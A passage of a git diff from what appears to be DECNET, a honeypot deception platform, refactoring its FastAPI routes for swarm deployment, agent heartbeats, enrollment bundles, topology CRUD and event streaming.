repo.get_realism_config(_CONFIG_KEY) + if row is not None: + try: + stored = json.loads(row.get("value") or "{}") + if isinstance(stored, dict): + planner.apply_payload(stored) + except (json.JSONDecodeError, ValueError) as exc: + log.warning( + "api.realism.get_config: stored payload invalid, " + "serving defaults: %s", exc, + ) + _hydrated = True return planner.current_payload() @@ -94,14 +99,17 @@ async def put_config( Validation: any structural failure raises 400 *before* the rebind, so the live config never goes torn. """ + global _hydrated if not isinstance(body, dict): raise HTTPException(status_code=400, detail="body must be an object") try: - planner.apply_payload(body) + dropped = planner.apply_payload(body) except ValueError as exc: raise HTTPException(status_code=400, detail=str(exc)) from exc + _hydrated = True + # Persist what the planner now reflects (keeps DB in sync with the # in-memory state — partial bodies merge into prior config). snapshot = planner.current_payload() @@ -112,4 +120,7 @@ async def put_config( user.get("username", user.get("uuid")), snapshot["canary_probability"], ) - return snapshot + response: dict[str, Any] = dict(snapshot) + if dropped: + response["dropped_entries"] = dropped + return response diff --git a/decnet/web/router/swarm/api_deploy_swarm.py b/decnet/web/router/swarm/api_deploy_swarm.py index 1142df8e..56f62843 100644 --- a/decnet/web/router/swarm/api_deploy_swarm.py +++ b/decnet/web/router/swarm/api_deploy_swarm.py @@ -57,6 +57,67 @@ def _worker_config( return base.model_copy(update=updates) +def _shard_payload( + d: DeckyConfig, + host_uuid: str, + state: str, + error: str | None, +) -> dict[str, Any]: + return { + "decky_name": d.name, + "host_uuid": host_uuid, + "services": json.dumps(d.services), + "decky_config": d.model_dump_json(), + "decky_ip": d.ip, + "state": state, + "last_error": error, + "updated_at": datetime.now(timezone.utc), + } + + +async def _dispatch( + host_uuid: str, + shard: list[DeckyConfig], + hosts: dict[str, dict[str, Any]], + config: DecnetConfig, + repo: BaseRepository, + dry_run: bool, + no_cache: bool, +) -> SwarmHostResult: + host = hosts[host_uuid] + cfg = _worker_config(config, shard, host) + try: + async with AgentClient(host=host) as agent: + body = await agent.deploy(cfg, dry_run=dry_run, no_cache=no_cache) + for d in shard: + await repo.upsert_decky_shard( + _shard_payload(d, host_uuid, "running" if not dry_run else "pending", None) + ) + await repo.update_swarm_host(host_uuid, {"status": "active"}) + return SwarmHostResult(host_uuid=host_uuid, host_name=host["name"], ok=True, detail=body) + except Exception as exc: + log.exception("swarm.deploy dispatch failed host=%s", host["name"]) + # Compose-up is partial-success-friendly: one decky failing to + # build doesn't roll back the ones that already came up. Ask the + # agent which containers actually exist before painting the whole + # shard red — otherwise decky1 and decky2 look "failed" even + # though they're live on the worker. + runtime: dict[str, Any] = {} + try: + async with AgentClient(host=host) as probe: + snap = await probe.status() + runtime = snap.get("runtime") or {} + except Exception: + log.warning("swarm.deploy: runtime probe failed host=%s — marking shard failed", host["name"]) + for d in shard: + rstate = runtime.get(d.name) or {} + is_up = bool(rstate.get("running")) + await repo.upsert_decky_shard( + _shard_payload(d, host_uuid, "running" if is_up else "failed", None if is_up else str(exc)[:512]) + ) + return SwarmHostResult(host_uuid=host_uuid, host_name=host["name"], ok=False, detail=str(exc)) + + async def dispatch_decnet_config( config: DecnetConfig, repo: BaseRepository, @@ -77,60 +138,11 @@ async def dispatch_decnet_config( raise HTTPException(status_code=404, detail=f"unknown host_uuid: {host_uuid}") hosts[host_uuid] = row - async def _dispatch(host_uuid: str, shard: list[DeckyConfig]) -> SwarmHostResult: - host = hosts[host_uuid] - cfg = _worker_config(config, shard, host) - try: - async with AgentClient(host=host) as agent: - body = await agent.deploy(cfg, dry_run=dry_run, no_cache=no_cache) - for d in shard: - await repo.upsert_decky_shard( - { - "decky_name": d.name, - "host_uuid": host_uuid, - "services": json.dumps(d.services), - "decky_config": d.model_dump_json(), - "decky_ip": d.ip, - "state": "running" if not dry_run else "pending", - "last_error": None, - "updated_at": datetime.now(timezone.utc), - } - ) - await repo.update_swarm_host(host_uuid, {"status": "active"}) - return SwarmHostResult(host_uuid=host_uuid, host_name=host["name"], ok=True, detail=body) - except Exception as exc: - log.exception("swarm.deploy dispatch failed host=%s", host["name"]) - # Compose-up is partial-success-friendly: one decky failing to - # build doesn't roll back the ones that already came up. Ask the - # agent which containers actually exist before painting the whole - # shard red — otherwise decky1 and decky2 look "failed" even - # though they're live on the worker. - runtime: dict[str, Any] = {} - try: - async with AgentClient(host=host) as probe: - snap = await probe.status() - runtime = snap.get("runtime") or {} - except Exception: - log.warning("swarm.deploy: runtime probe failed host=%s — marking shard failed", host["name"]) - for d in shard: - rstate = runtime.get(d.name) or {} - is_up = bool(rstate.get("running")) - await repo.upsert_decky_shard( - { - "decky_name": d.name, - "host_uuid": host_uuid, - "services": json.dumps(d.services), - "decky_config": d.model_dump_json(), - "decky_ip": d.ip, - "state": "running" if is_up else "failed", - "last_error": None if is_up else str(exc)[:512], - "updated_at": datetime.now(timezone.utc), - } - ) - return SwarmHostResult(host_uuid=host_uuid, host_name=host["name"], ok=False, detail=str(exc)) - results = await asyncio.gather( - *(_dispatch(uuid_, shard) for uuid_, shard in buckets.items()) + *( + _dispatch(uuid_, shard, hosts, config, repo, dry_run, no_cache) + for uuid_, shard in buckets.items() + ) ) return SwarmDeployResponse(results=list(results)) diff --git a/decnet/web/router/swarm/api_heartbeat.py b/decnet/web/router/swarm/api_heartbeat.py index df8bed24..dfcb4e3a 100644 --- a/decnet/web/router/swarm/api_heartbeat.py +++ b/decnet/web/router/swarm/api_heartbeat.py @@ -20,7 +20,8 @@ from collections.abc import MutableMapping from typing import Any, Optional from fastapi import APIRouter, Depends, HTTPException, Request -from pydantic import BaseModel +from pydantic import BaseModel, ValidationError +from sqlalchemy.exc import SQLAlchemyError from decnet.config import DeckyConfig from decnet.logging import get_logger @@ -61,7 +62,8 @@ def _extract_peer_fingerprint(scope: MutableMapping[str, Any]) -> Optional[str]: if chain: peer_der = chain[0] source = "primary" - except Exception: + except (AttributeError, KeyError, TypeError): + # scope["extensions"]["tls"] structure varies across uvicorn versions peer_der = None if peer_der is None: @@ -72,7 +74,8 @@ def _extract_peer_fingerprint(scope: MutableMapping[str, Any]) -> Optional[str]: peer_der = ssl_obj.getpeercert(binary_form=True) if peer_der: source = "fallback" - except Exception: + except (AttributeError, OSError): + # transport may not be an SSL transport, or the handshake may be incomplete peer_der = None if not peer_der: @@ -121,7 +124,8 @@ async def _reconcile_topology_report( try: topos = await repo.list_topologies(status=TopologyStatus.ACTIVE) - except Exception: + except SQLAlchemyError: + # Non-fatal: reconcile is best-effort; the host stays alive regardless log.exception("heartbeat: could not list active topologies") return mine = [t for t in topos if t.target_host_uuid == host_uuid] @@ -132,14 +136,15 @@ async def _reconcile_topology_report( reported_hash = (reported or {}).get("applied_version_hash") for topo in mine: - tid = topo["id"] - if topo.get("needs_resync"): + tid = topo.id + if topo.needs_resync: continue expected: Optional[str] = None if reported_id == tid and reported_hash: try: hydrated = await hydrate(repo, tid) - except Exception: + except (SQLAlchemyError, KeyError, TypeError): + # Non-fatal: skip this topology; mutator reconcile loop will retry log.exception("heartbeat: hydrate failed tid=%s", tid) continue if hydrated is None: @@ -155,7 +160,8 @@ async def _reconcile_topology_report( "reported_id=%s reported_hash=%s expected=%s)", tid, host_uuid, reported_id, reported_hash, expected, ) - except Exception: + except SQLAlchemyError: + # Non-fatal: mutator reconcile loop will detect the mismatch again next heartbeat log.exception("heartbeat: failed to flag resync tid=%s", tid) @@ -193,7 +199,7 @@ async def heartbeat( for decky_dict in status_body.get("deckies") or []: try: d = DeckyConfig(**decky_dict) - except Exception: + except (ValidationError, TypeError): log.exception("heartbeat: skipping malformed decky payload host=%s", req.host_uuid) continue rstate = runtime.get(d.name) or {} diff --git a/decnet/web/router/swarm_mgmt/api_enroll_bundle.py b/decnet/web/router/swarm_mgmt/api_enroll_bundle.py index d557615c..eee6de80 100644 --- a/decnet/web/router/swarm_mgmt/api_enroll_bundle.py +++ b/decnet/web/router/swarm_mgmt/api_enroll_bundle.py @@ -18,20 +18,19 @@ the embedded payload. Two URLs, one paste. from __future__ import annotations import asyncio -import io import os import pathlib import secrets -import tarfile from dataclasses import dataclass from datetime import datetime, timedelta, timezone from typing import Optional from fastapi import APIRouter, Depends, HTTPException, Request, Response, status -from pydantic import BaseModel, Field from decnet.logging import get_logger from decnet.swarm import pki +from decnet.swarm.bundle_builder import build_tarball, render_bootstrap +from decnet.web.db.models.swarm import EnrollBundleRequest, EnrollBundleResponse from decnet.web.db.repository import BaseRepository from decnet.web.dependencies import get_repo, require_admin @@ -43,72 +42,6 @@ BUNDLE_TTL = timedelta(minutes=5) BUNDLE_DIR = pathlib.Path(os.environ.get("DECNET_ENROLL_BUNDLE_DIR", "/tmp/decnet-enroll")) # nosec B108 - short-lived 0600 bundle cache, env-overridable SWEEP_INTERVAL_SECS = 30 -# Include list — explicit set of paths that ship to the agent. An -# include list fails closed: anything new on the master (stray .env, dev -# venvs, data dumps, editor scratch dirs) cannot leak into the bundle -# just because we forgot to exclude it. -# -# What the agent actually needs: -# * pyproject.toml at the repo root, so ``pip install`` works against -# the bundle during enroll_bootstrap.sh. -# * the ``decnet/`` package, MINUS the master-only subtrees called out -# by _EXCLUDED_DECNET_SUBTREES — those never import on an agent host. -# Everything else the bootstrap needs (the INI, certs, systemd units) is -# synthesized in-memory by ``_build_tarball`` below — it never hits the -# filesystem walk. - -# Top-level files shipped verbatim. Relative to the repo root. -_INCLUDED_ROOT_FILES: tuple[str, ...] = ("pyproject.toml",) - -# Top-level directories walked into the bundle. Relative to the repo root. -_INCLUDED_DIRS: tuple[str, ...] = ("decnet",) - -# Subtrees of an included directory that must NOT ship. Paths are -# relative to the repo root, forward-slash separated. -# * ``decnet/web`` — FastAPI master app, unused by agents. -# * ``decnet/mutator`` — schedules respawns swarm-wide; master-only. -# * ``decnet/profiler`` — rebuilds profiles against the master DB. -_EXCLUDED_DECNET_SUBTREES: frozenset[str] = frozenset({ - "decnet/web", - "decnet/mutator", - "decnet/profiler", -}) - - -# --------------------------------------------------------------------------- -# DTOs -# --------------------------------------------------------------------------- - -class EnrollBundleRequest(BaseModel): - master_host: str = Field(..., min_length=1, max_length=253, - description="IP/host the agent will reach back to") - agent_name: str = Field(..., pattern=r"^[a-z0-9][a-z0-9-]{0,62}$", - description="Worker name (DNS-label safe)") - with_updater: bool = Field( - default=True, - description="Include updater cert bundle and auto-start decnet updater on the agent", - ) - use_ipvlan: bool = Field( - default=False, - description=( - "Run deckies on this agent over IPvlan L2 instead of MACVLAN. " - "Required when the agent is a VirtualBox/VMware guest bridged over Wi-Fi — " - "Wi-Fi APs bind one MAC per station, so MACVLAN's extra container MACs " - "rotate the VM's DHCP lease. Safe no-op on wired/bare-metal hosts." - ), - ) - services_ini: Optional[str] = Field( - default=None, - description="Optional INI text shipped to the agent as /etc/decnet/services.ini", - ) - - -class EnrollBundleResponse(BaseModel): - token: str - command: str - expires_at: datetime - host_uuid: str - # --------------------------------------------------------------------------- # In-memory registry @@ -156,181 +89,16 @@ def _ensure_sweeper() -> None: _SWEEPER_TASK = asyncio.create_task(_sweep_loop()) -# --------------------------------------------------------------------------- -# Tarball construction -# --------------------------------------------------------------------------- - -def _repo_root() -> pathlib.Path: - # decnet/web/router/swarm_mgmt/api_enroll_bundle.py -> 4 parents = repo root. - return pathlib.Path(__file__).resolve().parents[4] +def _now() -> datetime: + # Indirection so tests can monkeypatch. + return datetime.now(timezone.utc) -def _iter_included(root: pathlib.Path) -> "list[tuple[pathlib.Path, str]]": - """Return ``(full_path, arcname)`` pairs for every file the agent needs. - - Walk is pruned in-place: ``__pycache__`` and the master-only subtrees - in :data:`_EXCLUDED_DECNET_SUBTREES` are skipped at the directory - level so we never descend into them (critical on dev boxes where - ``decnet/web/`` pulls in a fat frontend tree via package-data). - """ - found: list[tuple[pathlib.Path, str]] = [] - - # Top-level files. - for rel in _INCLUDED_ROOT_FILES: - p = root / rel - if p.is_file(): - found.append((p, rel)) - - # Top-level dirs, pruned. - for top in _INCLUDED_DIRS: - start = root / top - if not start.is_dir(): - continue - for dirpath, dirnames, filenames in os.walk(start, topdown=True, followlinks=False): - dir_path = pathlib.Path(dirpath) - rel_dir = dir_path.relative_to(root).as_posix() - - # Prune excluded subtrees + cache dirs BEFORE descending. - dirnames[:] = [ - d for d in dirnames - if d != "__pycache__" - and f"{rel_dir}/{d}" not in _EXCLUDED_DECNET_SUBTREES - ] - - for fn in filenames: - if fn.endswith((".pyc", ".pyo")): - continue - full = dir_path / fn - if full.is_symlink(): - continue - found.append((full, f"{rel_dir}/{fn}")) - - # Deterministic tarball ordering. - found.sort(key=lambda t: t[1]) - return found - - -def _render_decnet_ini( - master_host: str, - host_uuid: str, - use_ipvlan: bool = False, - swarmctl_port: int = 8770, -) -> bytes: - ipvlan_line = f"ipvlan = {'true' if use_ipvlan else 'false'}\n" - return ( - "; Generated by DECNET agent-enrollment bundle.\n" - "[decnet]\n" - "mode = agent\n" - "disallow-master = true\n" - "log-directory = /var/log/decnet\n" - f"{ipvlan_line}" - "\n" - "[agent]\n" - f"master-host = {master_host}\n" - f"swarmctl-port = {swarmctl_port}\n" - "swarm-syslog-port = 6514\n" - "agent-port = 8765\n" - "agent-dir = /etc/decnet/agent\n" - "updater-dir = /etc/decnet/updater\n" - f"host-uuid = {host_uuid}\n" - ).encode() - - -def _add_bytes(tar: tarfile.TarFile, name: str, data: bytes, mode: int = 0o644) -> None: - info = tarfile.TarInfo(name) - info.size = len(data) - info.mode = mode - info.mtime = int(datetime.now(timezone.utc).timestamp()) - tar.addfile(info, io.BytesIO(data)) - - -def _build_tarball( - master_host: str, - agent_name: str, - host_uuid: str, - issued: pki.IssuedCert, - services_ini: Optional[str], - updater_issued: Optional[pki.IssuedCert] = None, - use_ipvlan: bool = False, -) -> bytes: - """Gzipped tarball with: - - agent-required source (see :data:`_INCLUDED_DIRS` / - :data:`_INCLUDED_ROOT_FILES`; master-only decnet/ subtrees - pruned) - - etc/decnet/decnet.ini (pre-baked for mode=agent) - - home/.decnet/agent/{ca.crt,worker.crt,worker.key} - - home/.decnet/updater/{ca.crt,updater.crt,updater.key} (if updater_issued) - - services.ini at root if provided - """ - root = _repo_root() - buf = io.BytesIO() - with tarfile.open(fileobj=buf, mode="w:gz") as tar: - for path, arcname in _iter_included(root): - tar.add(path, arcname=arcname, recursive=False) - - _add_bytes( - tar, - "etc/decnet/decnet.ini", - _render_decnet_ini(master_host, host_uuid, use_ipvlan), - ) - for unit in _SYSTEMD_UNITS: - _add_bytes( - tar, - f"etc/systemd/system/{unit}.service", - _render_systemd_unit(unit, agent_name, master_host), - ) - _add_bytes(tar, "home/.decnet/agent/ca.crt", issued.ca_cert_pem) - _add_bytes(tar, "home/.decnet/agent/worker.crt", issued.cert_pem) - _add_bytes(tar, "home/.decnet/agent/worker.key", issued.key_pem, mode=0o600) - - if updater_issued is not None: - _add_bytes(tar, "home/.decnet/updater/ca.crt", updater_issued.ca_cert_pem) - _add_bytes(tar, "home/.decnet/updater/updater.crt", updater_issued.cert_pem) - _add_bytes(tar, "home/.decnet/updater/updater.key", updater_issued.key_pem, mode=0o600) - - if services_ini: - _add_bytes(tar, "services.ini", services_ini.encode()) - - return buf.getvalue() - - -_SYSTEMD_UNITS = ( - "decnet-agent", "decnet-forwarder", "decnet-engine", "decnet-updater", - # Per-host microservices — activated by enroll_bootstrap.sh. The - # profiler intentionally stays master-side: it rebuilds attacker - # profiles against the master DB, which workers don't share. - "decnet-collector", "decnet-prober", "decnet-sniffer", -) - - -def _render_systemd_unit(name: str, agent_name: str, master_host: str) -> bytes: - tpl_path = pathlib.Path(__file__).resolve().parents[1].parent / "templates" / f"{name}.service.j2" - tpl = tpl_path.read_text() - return ( - tpl.replace("{{ agent_name }}", agent_name) - .replace("{{ master_host }}", master_host) - ).encode() - - -def _render_bootstrap( - agent_name: str, - master_host: str, - tarball_url: str, - expires_at: datetime, - with_updater: bool, -) -> bytes: - tpl_path = pathlib.Path(__file__).resolve().parents[1].parent / "templates" / "enroll_bootstrap.sh.j2" - tpl = tpl_path.read_text() - now = datetime.now(timezone.utc).replace(microsecond=0).isoformat() - rendered = ( - tpl.replace("{{ agent_name }}", agent_name) - .replace("{{ master_host }}", master_host) - .replace("{{ tarball_url }}", tarball_url) - .replace("{{ generated_at }}", now) - .replace("{{ expires_at }}", expires_at.replace(microsecond=0).isoformat()) - .replace("{{ with_updater }}", "true" if with_updater else "false") - ) - return rendered.encode() +async def _lookup_live(token: str) -> _Bundle: + b = _BUNDLES.get(token) + if b is None or b.served or b.expires_at <= _now(): + raise HTTPException(status_code=404, detail="bundle not found or expired") + return b # --------------------------------------------------------------------------- @@ -403,7 +171,7 @@ async def create_enroll_bundle( ) # 3. Render payload + bootstrap. - tarball = _build_tarball( + tarball = build_tarball( req.master_host, req.agent_name, host_uuid, issued, req.services_ini, updater_issued, use_ipvlan=req.use_ipvlan, ) @@ -423,7 +191,7 @@ async def create_enroll_bundle( base = f"{scheme}://{netloc}" tarball_url = f"{base}/api/v1/swarm/enroll-bundle/{token}.tgz" bootstrap_url = f"{base}/api/v1/swarm/enroll-bundle/{token}.sh" - script = _render_bootstrap(req.agent_name, req.master_host, tarball_url, expires_at, req.with_updater) + script = render_bootstrap(req.agent_name, req.master_host, tarball_url, expires_at, req.with_updater) tgz_path.write_bytes(tarball) sh_path.write_bytes(script) @@ -446,18 +214,6 @@ async def create_enroll_bundle( ) -def _now() -> datetime: - # Indirection so tests can monkeypatch. - return datetime.now(timezone.utc) - - -async def _lookup_live(token: str) -> _Bundle: - b = _BUNDLES.get(token) - if b is None or b.served or b.expires_at <= _now(): - raise HTTPException(status_code=404, detail="bundle not found or expired") - return b - - @router.get( "/enroll-bundle/{token}.sh", tags=["Swarm Management"], diff --git a/decnet/web/router/topology/__init__.py b/decnet/web/router/topology/__init__.py index a251a064..10b06ddf 100644 --- a/decnet/web/router/topology/__init__.py +++ b/decnet/web/router/topology/__init__.py @@ -23,6 +23,7 @@ from .api_list_topologies import router as _list_router from .api_mutations import router as _mutations_router from .api_personas import router as _personas_router from .api_reap_orphans import router as _reap_router +from .api_tarpit import router as _tarpit_router from .api_teardown_topology import router as _teardown_router topology_router = APIRouter(prefix="/topologies", tags=["topologies"]) @@ -45,6 +46,7 @@ topology_router.include_router(_decky_router) topology_router.include_router(_edge_router) topology_router.include_router(_mutations_router) topology_router.include_router(_events_router) +topology_router.include_router(_tarpit_router) # Personas use a literal-suffix path (`/{id}/personas`) — register # before the bare `/{id}` getter so FastAPI's trie sees the literal # segment first. diff --git a/decnet/web/router/topology/_guards.py b/decnet/web/router/topology/_guards.py index c3c20fa5..944e1a4f 100644 --- a/decnet/web/router/topology/_guards.py +++ b/decnet/web/router/topology/_guards.py @@ -1,8 +1,6 @@ """Shared helpers for the Phase-3 child-CRUD routes.""" from __future__ import annotations -from typing import Any - from fastapi import HTTPException from decnet.topology.status import ( @@ -10,17 +8,18 @@ from decnet.topology.status import ( TopologyStatus, VersionConflict, ) +from decnet.web.db.models.topology import TopologySummary from decnet.web.dependencies import repo -async def get_topology_or_404(topology_id: str) -> dict[str, Any]: +async def get_topology_or_404(topology_id: str) -> TopologySummary: topo = await repo.get_topology(topology_id) if topo is None: raise HTTPException(status_code=404, detail="Topology not found") return topo -async def assert_pending_or_409(topology_id: str) -> dict[str, Any]: +async def assert_pending_or_409(topology_id: str) -> TopologySummary: """Ensure the topology exists and is in ``pending`` state. The repo layer enforces the same rule inside mutation methods, but the @@ -28,11 +27,11 @@ async def assert_pending_or_409(topology_id: str) -> dict[str, Any]: the pre-condition before any side effect. """ topo = await get_topology_or_404(topology_id) - if topo["status"] != TopologyStatus.PENDING: + if topo.status != TopologyStatus.PENDING: raise HTTPException( status_code=409, detail=( - f"Topology is {topo['status']!r}; free-form child edits are " + f"Topology is {topo.status!r}; free-form child edits are " f"pending-only. Use the mutation queue for active topologies." ), ) diff --git a/decnet/web/router/topology/api_catalog.py b/decnet/web/router/topology/api_catalog.py index 74f42ee7..c94e5723 100644 --- a/decnet/web/router/topology/api_catalog.py +++ b/decnet/web/router/topology/api_catalog.py @@ -22,6 +22,8 @@ from decnet.web.db.models import ( NextIPResponse, NextSubnetResponse, ServiceCatalogResponse, + ServiceConfigFieldDTO, + ServiceSchemaResponse, ) from decnet.web.dependencies import repo, require_viewer @@ -42,7 +44,48 @@ router = APIRouter() async def api_list_services( _viewer: dict = Depends(require_viewer), ) -> ServiceCatalogResponse: - return ServiceCatalogResponse(services=all_service_names()) + from decnet.services.registry import all_services + registry = all_services() + return ServiceCatalogResponse( + services=all_service_names(), + fleet_singletons=[ + name for name, svc in registry.items() if svc.fleet_singleton + ], + ) + + +@router.get( + "/services/{service_name}/schema", + tags=["MazeNET Topologies"], + response_model=ServiceSchemaResponse, + responses={ + 401: {"description": "Missing or invalid credentials"}, + 403: {"description": "Insufficient permissions"}, + 404: {"description": "Unknown service"}, + }, +) +@_traced("api.topology.catalog.service_schema") +async def api_service_schema( + service_name: str, + _viewer: dict = Depends(require_viewer), +) -> ServiceSchemaResponse: + """Return the declarative config schema for one service. + + Drives the schema-driven Inspector form on both Fleet and MazeNET. + Empty ``fields`` means the service has no customizable knobs yet — + the form renders a "No customizable fields" placeholder. + """ + from decnet.services.registry import get_service + try: + svc = get_service(service_name) + except KeyError: + raise HTTPException(status_code=404, detail=f"Unknown service: {service_name!r}") + return ServiceSchemaResponse( + name=svc.name, + ports=list(svc.ports), + fleet_singleton=bool(svc.fleet_singleton), + fields=[ServiceConfigFieldDTO(**f.to_json()) for f in svc.config_schema], + ) @router.get( @@ -121,13 +164,13 @@ async def api_next_ip( if await repo.get_topology(topology_id) is None: raise HTTPException(status_code=404, detail="Topology not found") lans = await repo.list_lans_for_topology(topology_id) - lan = next((ln for ln in lans if ln["id"] == lan_id), None) + lan = next((ln for ln in lans if ln.id == lan_id), None) if lan is None: raise HTTPException(status_code=404, detail="LAN not found") deckies = await repo.list_topology_deckies(topology_id) - alloc = IPAllocator(subnet=lan["subnet"]) + alloc = IPAllocator(subnet=lan.subnet) for d in deckies: - ip = (d.get("decky_config") or {}).get("ips_by_lan", {}).get(lan["name"]) + ip = (d.decky_config or {}).get("ips_by_lan", {}).get(lan.name) if ip: try: alloc.reserve(ip) @@ -137,4 +180,4 @@ async def api_next_ip( ip = alloc.next_free() except AllocatorExhausted as e: raise HTTPException(status_code=409, detail=str(e)) - return NextIPResponse(subnet=lan["subnet"], ip=ip) + return NextIPResponse(subnet=lan.subnet, ip=ip) diff --git a/decnet/web/router/topology/api_decky_crud.py b/decnet/web/router/topology/api_decky_crud.py index 5525cdab..0223772a 100644 --- a/decnet/web/router/topology/api_decky_crud.py +++ b/decnet/web/router/topology/api_decky_crud.py @@ -58,10 +58,10 @@ async def api_create_decky( raise map_repo_exception(exc) from exc rows = await repo.list_topology_deckies(topology_id) - row = next((r for r in rows if r["uuid"] == decky_uuid), None) + row = next((r for r in rows if r.uuid == decky_uuid), None) if row is None: # pragma: no cover raise HTTPException(status_code=500, detail="Decky insert vanished") - return DeckyRow(**row) + return row @router.patch( @@ -99,10 +99,10 @@ async def api_update_decky( raise HTTPException(status_code=404, detail=str(exc)) from exc rows = await repo.list_topology_deckies(topology_id) - row = next((r for r in rows if r["uuid"] == decky_uuid), None) + row = next((r for r in rows if r.uuid == decky_uuid), None) if row is None: raise HTTPException(status_code=404, detail="Decky not found") - return DeckyRow(**row) + return row @router.delete( @@ -126,7 +126,7 @@ async def api_delete_decky( await assert_pending_or_409(topology_id) rows = await repo.list_topology_deckies(topology_id) - if not any(r["uuid"] == decky_uuid for r in rows): + if not any(r.uuid == decky_uuid for r in rows): raise HTTPException(status_code=404, detail="Decky not found") try: diff --git a/decnet/web/router/topology/api_delete_topology.py b/decnet/web/router/topology/api_delete_topology.py index ba00ba7d..8e09a72e 100644 --- a/decnet/web/router/topology/api_delete_topology.py +++ b/decnet/web/router/topology/api_delete_topology.py @@ -36,11 +36,11 @@ async def api_delete_topology( topo = await repo.get_topology(topology_id) if topo is None: raise HTTPException(status_code=404, detail="Topology not found") - if topo["status"] not in _DELETABLE: + if topo.status not in _DELETABLE: raise HTTPException( status_code=409, detail=( - f"Topology is {topo['status']!r}; teardown to 'torn_down' " + f"Topology is {topo.status!r}; teardown to 'torn_down' " f"before delete." ), ) diff --git a/decnet/web/router/topology/api_deploy_topology.py b/decnet/web/router/topology/api_deploy_topology.py index 77b3f99f..6a3fa59d 100644 --- a/decnet/web/router/topology/api_deploy_topology.py +++ b/decnet/web/router/topology/api_deploy_topology.py @@ -63,11 +63,11 @@ async def api_deploy_topology( topo = await repo.get_topology(topology_id) if topo is None: raise HTTPException(status_code=404, detail="Topology not found") - if topo["status"] != TopologyStatus.PENDING: + if topo.status != TopologyStatus.PENDING: raise HTTPException( status_code=409, detail=( - f"Topology is {topo['status']!r}; only 'pending' topologies " + f"Topology is {topo.status!r}; only 'pending' topologies " f"can be deployed." ), ) diff --git a/decnet/web/router/topology/api_edge_crud.py b/decnet/web/router/topology/api_edge_crud.py index 3acd6dbc..96e3a9a5 100644 --- a/decnet/web/router/topology/api_edge_crud.py +++ b/decnet/web/router/topology/api_edge_crud.py @@ -46,13 +46,13 @@ async def api_create_edge( # Referential integrity: decky + LAN must belong to this topology. deckies = await repo.list_topology_deckies(topology_id) - if not any(d["uuid"] == body.decky_uuid for d in deckies): + if not any(d.uuid == body.decky_uuid for d in deckies): raise HTTPException( status_code=400, detail=f"decky {body.decky_uuid!r} not in topology {topology_id!r}", ) lans = await repo.list_lans_for_topology(topology_id) - if not any(r["id"] == body.lan_id for r in lans): + if not any(r.id == body.lan_id for r in lans): raise HTTPException( status_code=400, detail=f"lan {body.lan_id!r} not in topology {topology_id!r}", @@ -73,10 +73,10 @@ async def api_create_edge( raise map_repo_exception(exc) from exc edges = await repo.list_topology_edges(topology_id) - row = next((e for e in edges if e["id"] == edge_id), None) + row = next((e for e in edges if e.id == edge_id), None) if row is None: # pragma: no cover raise HTTPException(status_code=500, detail="Edge insert vanished") - return EdgeRow(**row) + return row @router.delete( @@ -100,7 +100,7 @@ async def api_delete_edge( await assert_pending_or_409(topology_id) edges = await repo.list_topology_edges(topology_id) - if not any(e["id"] == edge_id for e in edges): + if not any(e.id == edge_id for e in edges): raise HTTPException(status_code=404, detail="Edge not found") try: diff --git a/decnet/web/router/topology/api_events.py b/decnet/web/router/topology/api_events.py index 6fcab719..c7d89fbf 100644 --- a/decnet/web/router/topology/api_events.py +++ b/decnet/web/router/topology/api_events.py @@ -69,7 +69,7 @@ async def api_topology_events( # GET /topologies/{id}/mutations). Adding a new event family here # requires a threat-model review for F6/I (role leakage). topo = await get_topology_or_404(topology_id) - snapshot_status = topo["status"] + snapshot_status = topo.status in_flight: list[dict] = [] for state in _IN_FLIGHT_STATES: in_flight.extend(await repo.list_topology_mutations(topology_id, state=state)) @@ -102,38 +102,65 @@ async def api_topology_events( yield ": keepalive\n\n" return - sub = bus.subscribe(f"{_topics.TOPOLOGY}.{topology_id}.>") - try: + # Two subscriptions, merged through an asyncio.Queue: + # + # topology..> — lifecycle (status, mutation.*). + # decky.> — per-decky events, filtered to this + # topology by the event's payload. + # + # Decky events carry ``topology_id`` in their payload (see + # decnet.engine.services_live._publish); we discard ones + # that don't belong to this stream so a fleet decky sharing + # a name with a topology decky doesn't leak across. + topo_sub = bus.subscribe(f"{_topics.TOPOLOGY}.{topology_id}.>") + decky_sub = bus.subscribe(f"{_topics.DECKY}.>") + queue: asyncio.Queue = asyncio.Queue(maxsize=256) + + async def _pump(sub, *, only_topology: bool = False) -> None: async with sub: - sub_iter = sub.__aiter__() - while True: - if await request.is_disconnected(): - break - next_task = asyncio.ensure_future(sub_iter.__anext__()) + async for ev in sub: + if only_topology: + payload = ev.payload or {} + if payload.get("topology_id") != topology_id: + continue try: - event = await asyncio.wait_for(next_task, timeout=_KEEPALIVE_SECS) - except asyncio.TimeoutError: - next_task.cancel() - yield ": keepalive\n\n" - continue - except StopAsyncIteration: - break - # Map the bus event onto an SSE ``event:`` name that - # the frontend can switch on without parsing topics. - yield _format_sse( - _sse_name_for(event.topic), - { - "topic": event.topic, - "type": event.type, - "ts": event.ts, - "payload": event.payload, - }, + queue.put_nowait(ev) + except asyncio.QueueFull: + # Drop on overflow rather than backpressuring + # the bus; the snapshot + reconnect path will + # cover any gap a slow consumer creates. + pass + + topo_task = asyncio.create_task(_pump(topo_sub)) + decky_task = asyncio.create_task(_pump(decky_sub, only_topology=True)) + try: + while True: + if await request.is_disconnected(): + break + try: + event = await asyncio.wait_for( + queue.get(), timeout=_KEEPALIVE_SECS, ) + except asyncio.TimeoutError: + yield ": keepalive\n\n" + continue + yield _format_sse( + _sse_name_for(event.topic), + { + "topic": event.topic, + "type": event.type, + "ts": event.ts, + "payload": event.payload, + }, + ) except asyncio.CancelledError: pass except Exception: log.exception("topology events stream crashed topology_id=%s", topology_id) yield _format_sse("error", {"message": "Stream interrupted"}) + finally: + topo_task.cancel() + decky_task.cancel() return StreamingResponse( generator(), @@ -148,10 +175,25 @@ async def api_topology_events( def _sse_name_for(topic: str) -> str: """Derive an SSE ``event:`` name from a bus topic. - ``topology..mutation.applied`` → ``mutation.applied`` - ``topology..status`` → ``status`` + ``topology..mutation.applied`` → ``mutation.applied`` + ``topology..status`` → ``status`` + ``decky..service_added`` → ``decky.service_added`` + ``decky..service_removed`` → ``decky.service_removed`` Anything else is passed through unchanged so future topic families don't silently collapse onto a generic bucket. + + Bus topic segments are NATS-style tokens — no dots inside a segment + — which is why the leaf is ``service_added`` (underscore) here and + on the wire, not ``service.added``. The frontend's + ``useTopologyStream`` listens on the underscore form too. """ parts = topic.split(".", 2) - return parts[2] if len(parts) >= 3 else topic + if len(parts) < 3: + return topic + head, _ident, tail = parts + # Decky events: keep the ``decky.`` prefix so the 